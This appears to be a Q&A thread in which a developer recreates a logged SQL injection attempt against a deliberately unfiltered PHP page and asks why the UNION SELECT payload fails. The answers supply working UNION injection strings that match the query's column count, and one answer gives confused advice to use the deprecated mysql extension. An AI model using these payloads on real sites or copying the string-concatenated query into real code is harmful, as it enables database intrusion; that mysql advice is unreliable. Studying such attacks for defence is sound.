# MySQL injection penetration

Tags: mysql, sql, code-injection

I'm new here so I'll try to make my post as clear and readable as possible.

While browsing some site's log I came across some hacking attempts that I want to recreate/test in a closed server. I made a simple PHP web page that gets a variable named 'id' and without any filtering/validation use it in a query.

Relevant PHP code

```
$var = $_GET['id'];

echo $_GET['id'] . "<br>\n";

include ( "/var/www/dbconnect.php" );
$mysqli = new mysqli ( $db_host, $db_user, $db_password, "news" );
if ( $mysqli->connect_errno ) { echo "Failed to connect to MySQL: (" . $mysqli-   >connect_errno . ") " . $mysqli->connect_error; }

$query = "SELECT id, date, subject FROM news_table WHERE id=" . $var;
//$query = "SELECT id, date, subject FROM news_table WHERE id=250; DROP TABLE test;"; // This won't work because in PHP's implementation multiple statements are not allowed
if ( ! $result = $mysqli->query ( $query ) ) { echo "CALL failed: (" . $mysqli->errno . ") " . $mysqli->error; } else { }
```

Then I load the page using the following

```
testserver/test-files/test-mysql-vulnerability.php?id=362099999.1
union select unhex(hex(version())) -- 1=1
```

and get this result:

```
 CALL failed: (1222) The used SELECT statements have a different number
of columns
```

The hacker spent 5 minutes sending numerous combinations trying to break into our production server. My production server does not give any indication of success/failure like the error above.

My question is: Can the above hack work when the number of columns don't match? If so how?

tnx

Comment: Instead of trying to understand the `hack` fix your code to prevent it, don't use SQL like you did, use binders

Comment: BTW: Your questions seems more concerned with getting the hack to work rather than fixing it, are you trying to hack someone? :]

Comment: The fact that the hacker/s failed reflect in our good coding practices. The page was expecting an integer and it didn't get it. Detecting and reacting to the situation is the fix. We know the fix what we didn't know was what the hacker was trying to do... now I know

Comment: What you are saying is wrong, the fact that he couldn't get it to work isn't BECAUSE of the "integer", its because he didn't spend enough time causing you harm, or he did, and you just didn't see his success

Comment: The fact that he couldn't get in is because we validate and sanitize everything and our code is good. We have periodic forensic and incident report evaluations I'm confident that he/she failed. I'm not saying that it is impossible to hack the server in question what I'm saying is that we are trying to be one step ahead of potential problems.

Answer (score 1, accepted):

As noted in the comments, don't do this.

To answer your question, though, `union` is useful in injections because it allows you to use an unrelated table in the output.  The error you're seeing is because the original database query wanted a certain number and type of columns, and the injected query wanted only one.  In this case we know that we need three columns (from the code), so we want the resultant SQL statement to be

```
SELECT id, date, subject FROM news_table WHERE id=3 union select 0, 0, unhex(hex(version())) --
```

(This may not work exactly depending on your data types and my ability to do this off the top of my head).

Comment: That works. To better understand what is happening you have to be able to understand what the hacker is trying to do.

Comment: I apologize if I broke some rules. I became interested by watching a SANS video by David Hoelzer on an unrelated topic (stack overflow) I'm too old to be a hacker :)

Comment: It's possible the hacker was poking around out of the same curiosity rather than trying to cause harm. That's never guaranteed, though. I highly recommend you switch to the PDO database extension. Parameterized queries make it impossible to commit this kind of attack.

Comment: Steve, I think the hacker was trying to find a way to get into the system what else can be? I can write a book with the logs of that particular site. That server is super paranoid, everything is logged... in great detail for example every hack attempt is recorded like in this case

Answer (score 0):

```
SELECT id, 
       date, 
       subject 
FROM   news_table 
WHERE  id = 3 
UNION 
SELECT NULL                  AS id, 
       NULL                  AS date, 
       Unhex(Hex(Version())) AS subject
```

also use mysql instead of mysqli as it is more prone to injections

Comment: mysql is deprecated as PHP v5.5.0 Am I missing something?

Comment: no you are not missing something, mysql is depreciated in newer versions as it was more prone to sql - injections